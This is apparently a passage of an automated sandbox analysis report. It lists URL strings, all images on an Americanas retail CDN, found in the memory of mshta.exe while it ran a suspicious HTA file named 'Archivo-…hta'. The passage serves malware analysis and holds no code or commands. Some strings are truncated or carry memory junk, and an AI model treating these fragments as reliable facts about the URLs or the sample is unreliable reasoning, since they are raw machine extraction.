memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/250x260-atalho-desk-app-baixe-o-app1-fb5282b
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548607709.00000000051EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png.pngpng/
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535690117.000000000533F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png96648a2579.p
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngfle
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548607709.00000000051EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngge
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541104110.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngnE
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngter=
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.pngay:-
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540350568.0000000005D34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pngent
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-informatica-acessorios-8f96648a2579.
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-papelaria-a64647ae2a59.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541104110.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541001704.0000000005E48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-suplementos-vitaminas-2e13c2882cd2.p
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540707630.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/15/403398377_1344107672905432_87087219184302511
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535727062.000000000530E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/05/02/250x260-atalho-app-mais-barato-no-app-129882
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/06/12/atalhos-esporte-fitness-e-lazer-5b7f212400c3
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535775149.000000000530C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/06/25/DESK_APP-ATL-SERVICO-GIFTCARD-9f3f630fb4f0-4
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-1-b820f7d67f0c.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-e904efa9812b.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.w
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/16/MACROSSHome2-432x540px-cb8bf5b6c936.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/16/MACROSSHome2-432x540px-cb8bf5b6c936.pngNY::-
